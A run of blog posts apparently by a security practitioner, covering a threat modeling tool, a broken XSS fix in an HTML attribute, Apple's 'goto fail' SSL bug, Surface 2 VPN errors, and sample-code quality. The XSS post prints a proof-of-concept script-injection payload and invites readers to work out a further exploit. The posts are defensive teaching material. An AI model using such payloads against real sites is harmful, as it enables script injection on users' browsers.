  • Analysis is per-interaction, rather than per-object [scary, but functionally equivalent to per-object]
  • The file format is XML, and is reasonably resilient to modification
  • Objects and data flows can represent multiple types, defined in an XML KnowledgeBase
  • These types can have customised data elements, also defined in XML
  • The rules about what threats to generate are also defined in XML
  • [These together mean an enterprise can create a library of threats for their commonly-used components]
  • Trust boundaries can be lines, or boxes (demonstrating that trust boundaries surround regions of objects)
  • Currently supported by a development team who are responsive to feature requests

Call to Action?

Yes, every good blog post has to have one of these, doesn’t it? What am I asking you to do with this information?

Download the tool. Try it out on a relatively simple project, and see how easy it is to generate a few threats.

Once you’re familiar with the tool, visit the KnowledgeBase directory in the tool’s installation folder, and read the XML files that were used to create your threats.

Add an object type.

Add a data flow type.

Add custom properties that describe your custom types.

Use those custom properties in a rule you create to generate one of the common threats in your environment.

Work with others in your security and development teams to generate a good threat library, and embody it in XML rules that you can distribute to other users of the threat modeling tool in your enterprise.

Document and mitigate threats. Measure how successful you are, at predicting threats, at reducing risk, and at impacting security earlier in your development cycle.

Then do a better job on each project.

Ways you haven’t stopped my XSS, Number 2–backslash doesn’t encode quotes in HTML attributes

Last time in this series, I posted an example where XSS was possible because a site’s developer was unaware of the implications of his JavaScript being hosted inside HTML.

This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc) methods don’t always apply to HTML.

The XSS mantra for HTML attributes

I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.

The context dictates what encoding you need, whether the context is “JavaScript string”, “JavaScript code”, “HTML attribute”, “HTML content”, “URL”, “CSS expression”, etc, etc.

In the case of HTML attributes, it’s actually fairly simple.

Unless you are putting a URL into an attribute, there are three simple rules:

  1. Every attribute’s value must be quoted, whether with single quotes or double quotes.
  2. If the quote you use appears in the attribute value, it must be encoded.
  3. You must encode any characters which could confuse the encoding. [Encode the encoding characters]

Seems easy, right?

This is all kinds of good, except when you run into a site where the developer hasn’t really thought about their encoding very well.

You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.

To HTML, the back-slash has no particular meaning.

I see this all the time – I want to inject script, but the site only lets me put user data into an attribute value:

<meta name="keywords" content="Wot I searched for">

That’s lovely. I’d like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:

<meta name="keywords" content=""><script>prompt(1)</script>">

The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:

<meta name="keywords" content="\"><script>prompt(1)</script>">

Nice try, Charlie, but that back-slash, it’s just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your ‘fix’ got broken as soon as you released it.

Oh, if only you had chosen the correct HTML encoding, and replaced my quote with “&quot;” [and therefore, also replaced every “&” in my query with “&amp;”], we’d be happy.
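Here’s a minimal sketch of that encoding in C, assuming the value is going into a quoted attribute that does not hold a URL. The function name encode_html_attribute is hypothetical. It encodes both kinds of quote, since either may be the delimiter, plus the ampersand. Encoding the angle brackets as well is an extra precaution of this sketch, not one of the three rules.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper, for illustration only.
 * Writes an HTML-attribute-encoded copy of src into dst, whose capacity
 * dst_cap includes the terminating NUL.
 * Returns 0 on success, -1 if dst is too small. */
int encode_html_attribute(const char *src, char *dst, size_t dst_cap)
{
    size_t used = 0;

    if (dst_cap == 0) {
        return -1;
    }
    for (; *src != '\0'; ++src) {
        char single[2] = { *src, '\0' };
        const char *rep;
        size_t len;

        switch (*src) {
        case '&':  rep = "&amp;";  break;  /* encode the encoding character */
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        case '<':  rep = "&lt;";   break;  /* extra precaution */
        case '>':  rep = "&gt;";   break;  /* extra precaution */
        default:   rep = single;   break;
        }
        len = strlen(rep);
        /* Always leave room for the terminating NUL. */
        if (used + len + 1 > dst_cap) {
            return -1;
        }
        memcpy(dst + used, rep, len);
        used += len;
    }
    dst[used] = '\0';
    return 0;
}
```

Fed my proof of concept, this produces &quot;&gt;&lt;script&gt;prompt(1)&lt;/script&gt;, which the browser treats as nothing more than the text of the content attribute.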

And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security team’s guidance.

Exercise for the reader – how do you exploit this example if I don’t encode the quotes, but I do strip out angle brackets?

Apple’s “goto fail” SSL issue–how do you avoid it?

Context – Apple releases security fix; everyone sees what they fixed

 

Last week, Apple released a security update for iOS, indicating that the vulnerability being fixed is one that allows SSL / TLS connections to continue even though the server should not be authenticated. This is how they described it:

Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS

Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.

Secure Transport is their library for handling SSL / TLS, meaning that the bulk of applications written for these platforms would not adequately validate the authenticity of servers to which they are connected.

Ignore “An attacker with a privileged network position” – this is the very definition of a Man-in-the-Middle (MITM) attacker, and whereas we used to be more blasé about this in the past, when networking was done with wires, now that much of our use is wireless (possibly ALL in the case of iOS), the MITM attacker can easily insert themselves in the privileged position on the network.

The other reason to ignore that terminology is that SSL / TLS takes as its core assumption that it is protecting against exactly such a MITM. By using SSL / TLS in your service, you are noting that there is a significant risk that an attacker has assumed just such a privileged network position.

Also note that “failed to validate the authenticity of the connection” means “allowed the attacker to attack you through an encrypted channel which you believed to be secure”. If the attacker can force your authentication to incorrectly succeed, you believe you are talking to the right server, and you open an encrypted channel to the attacker. That attacker can then open an encrypted channel to the server to which you meant to connect, and echo your information straight on to the server, so you get the same behaviour you expect, but the attacker can see everything that goes on between you and your server, and modify whatever parts of that communication they choose.

So this lack of authentication is essentially a complete failure of your secure connection.

As always happens when a patch is released, within hours (minutes?) of the release, the patch has been reverse engineered, and others are offering their description of the changes made, and how they might have come about.

In this case, the reverse engineering was made easier by the availability of open source copies of the source code in use. Note that this is not an intimation that open source is, in this case, any less secure than closed source, because the patches can be reverse engineered quickly – but it does give us a better insight into exactly the code as it’s seen by Apple’s developers.

Here’s the code:

    if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Yes, that’s a second “goto fail”, which means that the last “if” is never evaluated, and the jump to the ‘fail’ label is always taken. Because the condition before it succeeded, however, the code at ‘fail’ runs with ‘err’ set to 0, so the caller is told that everything checked out.

Initial reaction – lots of haha, and suggestions of finger pointing

So, of course, the Internet being what it is, the first reaction is to laugh at the clowns who made such a simple mistake, that looks so obvious.

T-shirts are printed with “goto fail; goto fail;” on them. Nearly 200 have been sold already (not for me – I don’t generally wear black t-shirts).

But really, these are smart guys – “be smarter” is not the answer

This is SSL code. You don’t get let loose on SSL code unless you’re pretty smart to begin with. You don’t get to work as a developer at Apple on SSL code unless you’re very smart.

Clearly “be smart” is already in evidence.

There is a possibility that this is too much in evidence – that the arrogance of those with experience and a track record may have led these guys to avoid some standard protective measures. The evidence certainly fits that view, but then many developers start with that perspective anyway, so in the spirit of working with the developers you have, rather than the ones you theorise might be possible, let’s see how to address this issue long term:

Here are my suggested answers – what are yours?

Enforce indentation in your IDE / check-in process

OK, so it’s considered macho to not rely on an IDE. I’ve never understood that. It’s rather like saying how much you prefer pounding nails in with your bare fists, because it demonstrates how much more of a man you are than the guy with a hammer. It doesn’t make sense when you compare how fast the job gets done, or the silly and obvious errors that turn up clearly when the IDE handles your indenting, colouring, and style for you.

Yes, colouring. I know, colour-blind people exist – and those people should adjust the colours in the IDE so that they make sense. Even a colour-blind person can get shade information to help them. I know syntax colouring often helps me spot when an XSS injection is just about ready to work, when I would otherwise have missed it in all the surrounding garbage of HTML code. The same is true when building code: you can spot when keywords are being interpreted as values, when string delimiters are accidentally unescaped, etc.

The same is true for indentation. Indentation, when it’s caused by your IDE based on parsing your code, rather than by yourself pounding the space bar, is a valuable indication of program flow. If your indentation doesn’t match control flow, it’s because you aren’t enforcing indentation with an automated tool.

What the heck, enforce all kinds of style

Your IDE and your check-in process are a great place to enforce style standards to ensure that code is not confusing to the other developers on your team – or to yourself.

A little secret – one of the reasons I’m in this country in the first place is that I sent an eight-page fax to my bosses in the US, criticising their programming style and blaming (rightly) a number of bugs on the use of poor and inconsistent coding standards. This was true two decades ago using Fortran, and it’s true today in any number of different languages.

The style that was missed in this case – put braces around all your conditionally-executed statements.
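To see what the braces buy you, here’s a stripped-down sketch. It is not Apple’s code: step_ok and step_fail are hypothetical stand-ins for the hashing calls, each returning 0 on success. The stray goto in the first function is shown at the indentation an automatic formatter would give it.

```c
/* Hypothetical stand-ins for the hashing steps; 0 means success. */
static int step_ok(void)   { return 0; }
static int step_fail(void) { return -1; }

/* Without braces: the duplicated line is a statement of its own. */
int verify_unbraced(void)
{
    int err;

    if ((err = step_ok()) != 0)
        goto fail;
    goto fail;                  /* always taken, with err still 0 */
    if ((err = step_fail()) != 0)
        goto fail;
fail:
    return err;
}

/* With braces: the duplicated line stays inside the conditional block. */
int verify_braced(void)
{
    int err;

    if ((err = step_ok()) != 0) {
        goto fail;
        goto fail;              /* redundant, but only reachable on error */
    }
    if ((err = step_fail()) != 0) {
        goto fail;
    }
fail:
    return err;
}
```

The unbraced version returns 0 without ever running the final check. The braced version runs it and returns the error.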

I have other style recommendations that have worked for me in the past – meaningful variable names, enforced indenting, maximum level of indenting, comment guidelines, constant-on-the-left of comparisons, don’t include comparisons and assignments in the same line, one line does one thing, etc, etc.

Make sure you back the style requirements with statements as to what you are trying to do with the style recommendation. “Make the code look the same across the team” is a good enough reason, but “prevent incorrect flow” is better.

Make sure your compiler warns on unreachable code

gcc has the option “-Wunreachable-code”.

gcc disabled the option in 2010.

gcc silently disabled the option, because they didn’t want anyone’s build to fail.

This is not (IMHO) a smart choice. If someone has a warning enabled, and has enabled the setting to produce a fatal error on warnings, they WANT their build to fail if that warning is triggered, and they WANT to know when that warning can no longer be relied upon.

So, without a warning on unreachable code, you’re basically screwed when it comes to control flow going where you don’t want it to.

Compile with warnings set to fatal errors

And of course there’s the trouble that’s caused when you have dozens and dozens of warnings, so warnings are ignored. Don’t get into this state – every warning is a place where the compiler is confused enough by your code that it doesn’t know whether you intended to do that bad thing.

Let me stress – if you have a warning, you have confused the compiler.

This is a bad thing.

You can individually silence warnings (with plenty of comments in your code, please!) if you are truly in need of a confusing operation, but for the most part, it’s a great saving on your code cleanliness and clarity if you address the warnings in a smart and simple fashion.

Don’t over-optimise or over-clean your code

The compiler has an optimiser.

It’s really good at its job.

It’s better than you are at optimising code, unless you’re going to get more than a 10-20% improvement in speed.

Making code shorter in its source form does not make it run faster. It may make it harder to read. For instance, this is a perfectly workable form of strstr:

const char * strstr(const char *s1, const char *s2)

{

  return (!s1||!s2||!*s2)?s1:((!*s1)?0:((*s1==*s2&&s1==strstr(s1+1,s2+1)-1)?s1:strstr(s1+1,s2)));

}

Can you tell me if it has any bugs in it?

What’s its memory usage? Processor usage? How would you change it to make it work on case-insensitive comparisons? Does it overflow buffers?

Better still: does it compile to smaller or more performant code, if you rewrite it so that an entry-level developer can understand how it works?

Now go and read the implementation from your CRT. It’s much clearer, isn’t it?
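If you don’t have your CRT’s source to hand, here’s a sketch of what a readable version might look like. It is an illustration, not the code from any particular C runtime, and it is named find_substring (a hypothetical name) so that it doesn’t clash with the library’s strstr. It treats NULL arguments the way the one-liner above does.

```c
#include <stddef.h>

/* Returns a pointer to the first occurrence of needle in haystack,
 * or NULL if there is none. An empty needle matches at the start. */
const char *find_substring(const char *haystack, const char *needle)
{
    if (haystack == NULL || needle == NULL) {
        return haystack;        /* mirrors the one-liner's NULL handling */
    }
    for (const char *start = haystack; ; ++start) {
        const char *h = start;
        const char *n = needle;

        /* Walk both strings while they agree. h cannot pass the end of
         * haystack, because a NUL there can only equal the needle's own
         * NUL, and the loop has already stopped by then. */
        while (*n != '\0' && *h == *n) {
            ++h;
            ++n;
        }
        if (*n == '\0') {
            return start;       /* the whole needle matched here */
        }
        if (*start == '\0') {
            return NULL;        /* ran out of haystack */
        }
    }
}
```

It’s longer, but the questions about buffer overruns and about how you’d make it case-insensitive now have visible answers.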

Release / announce patches when your customers can patch

Releasing the patch on Friday for iOS and on Tuesday for OS X may have actually been the correct move – but it brings home the point that you should time your patch releases for the best trade-off between your customers patching the issue and your attackers reverse engineering it to build attacks.

Make your security announcements findable

Where is the security announcement at Apple? I go to apple.com and search for “iOS 7.0.6 security update”, and I get nothing. It’d be really nice to find the bulletin right there. If it’s easier to find your documentation from outside your web site than from inside, you have a bad search engine.

Finally, a personal note

People who know me may have the impression that I hate Apple. It’s a little more nuanced than that.

I accept that other people love their Apple devices. In many ways, I can understand why.

I have previously owned Apple devices – and I have tried desperately to love them, and to find why other people are so devoted to them. I have failed. My attempts at devotion are unrequited, and the device stubbornly avoids helping me do anything useful.

Instead of a MacBook Pro, I now use a ThinkPad. Instead of an iPad (remember, I won one for free!), I now use a Surface 2.

I feel like Steve Jobs turned to me and quoted Dr Frank N Furter: “I didn’t make him for you.”

So, no, I don’t like Apple products FOR ME. I’m fine if other people want to use them.

This article is simply about a really quick and easy example of how simple faults cause major errors, and what you can do, even as an experienced developer, to prevent them from happening to you.

Surface 2 –VPN bug disables Metro Internet Explorer

Update 2 – NOT FIXED

Yeah, so, I was apparently deluded, the problem is still here. It appears to be a bona-fide bug in Windows 8, with a Hotfix at http://support.microsoft.com/kb/2797356 – but that’s only for x86 versions of Windows, and not for the Surface 2.

Update – FIXED

Since I wrote this article, another issue caused me to reset my WMI database, by deleting everything under C:\Windows\System32\wbem\Repository and rebooting. After that, the VPN issues documented in this article have gone away.

Original article

I have a home VPN – everyone should, because it makes for securable access to your home systems when you are out and about, whether it’s at the Starbucks down the street, or half way across the world, like I was on my trip to China last week.

Useful as my home VPN is, and hard as it is to get working (see my last post on Windows 8 VPN problems), it’s only useful if I can get my entire computer to talk through the VPN.

Sidebar – VPN split tunneling

Note that I am not disputing the value of split tunneling in a VPN, which is where you might set up your client to use the VPN only for a range of addresses, so that (for example) a computer might connect to the VPN for connections to a work intranet, but use the regular connectivity for the major part of the public web. For this article, assume I want everything but my link-local traffic to be forwarded to my VPN.

So, in my last VPN post, we talked about setting up the client end of a VPN, and now I want to use it.

Connecting is the easy part, and once connected, most of my apps on the Surface 2 work quite happily, connecting to the Internet through my VPN.

All of the Desktop apps seem to work without restriction, but there are some odd gaps when it comes to using “Windows Store” apps, also known as “Metro” or “Modern UI” apps. Microsoft can’t call this “Metro” any more, even though that’s the most commonly used term for it, so I’ll follow their lead and call this the “Modern UI” [where UI stands for User Interface].

Most glaring of all is the Modern UI Internet Explorer, which doesn’t seem to allow any connections at all, simply displaying “This page can’t be displayed”. The exception to this is if I connect to a web server that is link-local to the VPN server.

I’d think this was a problem with the way I had set up my VPN server, or my client connection, if it weren’t for the fact that my Windows 8.1 laptop connects correctly to this same VPN with no issues on Modern or Desktop versions of Internet Explorer, and of course the undeniable feature that Internet Explorer for the Desktop on my Surface 2 also works correctly.

I’d like to troubleshoot and debug this issue, but of course, the only troubleshooting tools for networking in the Surface 2 run on the Desktop, and therefore work quite happily, as if nothing is wrong with the network. And from their perspective, this is true.

When Bagpuss goes to sleep, all his little friends go to sleep, too.

Of course, Internet Explorer has always been claimed by Microsoft to be a “part of the operating system”, and in Windows RT 8.1, there is no difference in this respect.

Every Modern UI application which includes a web control, web view, or in some way asks the operating system or development framework to host a web page, also fails to reach its intended target through the VPN.

Technical Support – what’s their take?

Technical support had me try a number of things, including resetting the system, but none of their suggestions had any effect. Eventually I found a tech support rep who told me this is a bug, not that that is really what you’d call a resolution of my problem. These are the sort of things that make it clear that the Surface is still in its early days, and while impressive, has a number of niggling issues that need “fit and finish” work before significant other features get added.

Error 860 in Windows 8.1 / Surface VPN

It should be easy enough to set up a VPN in Windows, and everything should work well, because Microsoft has been doing these sorts of things for some years.

clip_image002

Sure enough, if you open up the Charms bar, choose Settings, Change PC Settings, and finally Network, you’re brought to this screen, with a nice big friendly button to add a VPN connection. Tapping on it leads me to the following screen:

clip_image004

No problems, I’ve already got these settings ready to go.

clip_image006

Probably not the best to name my VPN settings “New VPN”, but then I’m not telling you my VPN endpoint. So, let’s connect to this new connection.

clip_image008

So far, so good. Now it’s verifying my credentials…

clip_image010

And then we should see a successful connection message.

clip_image012

Not quite. For the search engines, here’s the text:

Error 860: The remote access connection completed, but authentication failed because of an error in the certificate that the client uses to authenticate the server.

This is upsetting, because of course I’ve spent some time setting the certificate correctly (more on that in a later post), and I know other machines are connecting just fine.

I’m sure that, at this point, many of you are calling your IT support team, and they’re reminding you that they don’t support Windows 8 yet, because of some lame excuse about “not yet stable, official, standard, or Linux”.

Don’t take any of that. Simply open the Desktop.

What? Yes, Windows 8 has a Desktop. And a Command Prompt, and PowerShell. Even in the RT version.

Oh, uh, yeah, back to the instructions.

Forget navigating the desktop, just do Windows-X, and then W, to open the Network Connections group, like this:

clip_image014

Select the VPN network you’ve created, and select the option to “Change settings of this connection”:

clip_image016

In the Properties window that pops up, you need to select the Security tab:

clip_image018

OK, so that’s weird. The Authentication Group Box has two radio buttons – but neither one is selected. My Grandma had a radio like that, you couldn’t tell what station you were going to get when you turned it on – and the same is generally true for software. So, we should choose one:

clip_image020

It probably matters which one you choose, so check with your IT team (tell them you’re connecting from Windows 7, if you have to).

Then we can connect again:

clip_image022 clip_image024 clip_image026

And… we’re connected.

Now for another surprise, when you find that the Desktop Internet Explorer works just fine, but the “Modern UI” (formerly known as “Metro”) version of IE decides it will only talk to sites inside your LAN, and won’t talk to external sites. Oh, and that behavior is extended to any Metro app that embeds web content.

I’m still working on that one. News as I have it!

There is no such thing as “small sample code”

Every few months, something encourages me to make the tweet that:

There is no such thing as “small sample code”, every sample you publish is an SDK of its own

OK, so the choice of calling these “SDKs” is rooted in my Microsoft dev background, where “sample code” didn’t need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.

The basic point here is to remind you that you do not get to abrogate all responsibility by saying “this is sample code, you will need to add error checking and security”, even if you do say it in the article – even if you say it in the comments of the sample!

Why do I care so much? It’s only three lines of code!

Simply stated, I’ve seen too many cases where people have included three lines of code (or five, or twenty, the count doesn’t matter) into a program, and they’ve stepped away and shipped that code.

“It wasn’t my fault,” they say, when the incident happens, “I copied that code from a sample online.”

This is the point at which the re-education machine is engaged – because, of course, it totally is your fault, if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished – usually by having to stay late and fix it.

It’s also the sample writer’s fault.

He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with “well, of course, you should add your own error checks and security magic to it”.

Here’s an example of what I’m talking about, courtesy of Troy Hunt linking to an ASP forum.

No, if you’re providing sample code on the Internet, it’s important to make sure it doesn’t embody BAD design; this is code that will be taken up by people by definition less keen, less eager, less smart and less motivated to do things right than you are – after all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how it’s done. If you then teach them how it’s done badly, that’s how they will learn to do it – badly. And they will teach others.

So, instead, make your three line samples five lines, and add enough error checking that unexpected issues or other bad things will break the sample’s execution.
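As a sketch of what that might look like, take a “read the first line of a file” sample. The three-line version is fopen, fgets, fclose. The version below, with the hypothetical name read_first_line, is longer, but every call that can fail is checked, so whoever pastes it in gets a failure they can’t ignore instead of a half-filled buffer.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical sample: read the first line of a file into buf.
 * Returns 0 on success, -1 on any failure. */
int read_first_line(const char *path, char *buf, size_t buf_len)
{
    FILE *f;
    int ok;

    if (path == NULL || buf == NULL || buf_len == 0 || buf_len > INT_MAX) {
        return -1;
    }
    f = fopen(path, "r");
    if (f == NULL) {
        return -1;                      /* missing file, no permission, ... */
    }
    ok = (fgets(buf, (int)buf_len, f) != NULL);
    if (fclose(f) != 0) {
        ok = 0;
    }
    if (!ok) {
        buf[0] = '\0';                  /* never hand back stale contents */
        return -1;
    }
    buf[strcspn(buf, "\r\n")] = '\0';   /* drop the trailing newline, if any */
    return 0;
}
```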

Oh yeah, and what about updates, when you find a horrendous bug – how do you distribute those?